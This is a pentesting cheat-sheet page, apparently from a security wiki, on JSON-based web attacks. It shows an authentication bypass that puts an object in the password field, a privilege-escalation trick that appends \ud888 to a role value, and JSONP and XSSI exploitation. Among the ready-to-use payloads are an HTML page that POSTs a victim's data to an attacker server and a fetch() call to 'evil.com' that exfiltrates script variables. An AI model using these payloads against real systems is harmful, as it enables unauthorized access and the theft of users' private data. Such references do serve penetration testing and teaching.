JSON Attack

PreviousCRLF Injection NextPrototype Pollution

Last updated 1 month ago

Was this helpful?

JSON Attack

POST /api/login HTTP/1.1
Host: vuln-web.io
[...]

{"username":"admin","password":{"password": 1}}

Add Parameter

JSON Injection

POST /user/create HTTP/1.1
...
Content-Type: application/json
{
   "user": "dana", 
   "role": "administrator"
}

HTTP/1.1 401 Not Authorized
...
Content-Type: application/json

{"Error": "Assignment of internal role 'administrator' is forbidden"}

Add \ud888

POST /user/create HTTP/1.1
...
Content-Type: application/json
{
   "user": "dana", 
   "role": "administrator\ud888"
}

HTTP/1.1 200 OK
...
Content-Type: application/json

{"result": "OK: Created user ‘dana’ with the role of ‘administrator’"}

JSON Padding, JSONP

Detection

Add a callback parameter to a JSON URL, by appending ?callback=something to the URL.
When a format type is provided, change it to JSONP. Change ?format=json to ?format=jsonp.

Exploit

Json file

Add a query parameter of callback like this

https://user.redact.com/payment/wallet/balance?callback=call_me

If the endpoint has JSONP enabled it will create an object with the name of call_me and all the data will be inside that object like this.

Exploitation: create a .html file which will extract the data and store it on your desired server. You just have to send the URL to the victim

<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="referrer" content="no-referrer">
    <title>Test JSON Padding Attack</title>
</head>
<body>

<script>
function call_me(response) {
    var http = new XMLHttpRequest();
    var url = 'https://yourserver.com/store.php';
    var params = 'data=' + encodeURIComponent(JSON.stringify(response));

    http.open('POST', url, true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

    http.onreadystatechange = function() {
        if (http.readyState == 4 && http.status == 200) {
            console.log(http.responseText);
        }
    }
    http.send(params);
}
</script>

<script src="https://user.redact.com/api/user/profile?callback=call_me"></script>

</body>
</html>

XSSI an JSONP

On your own server

<html>
  <head>
    <title>Regular XSSI</title>
    <script src="https://www.vulnerable-domain.tld/script.js"></script>
  </head>
  <body>
    <script>
      alert(JSON.stringify(keys[0]));
    </script>
  </body>
</html>

Exfiltration

<script src="https://target.com/vuln.js">
</script>
<script defer>
// var_name is a variable in vuln.js holding sensitive information
console.log(var_name);
// sending information to an attacker controlled server
fetch("https://evil.com/stealInfo?info="+var_name);
</script>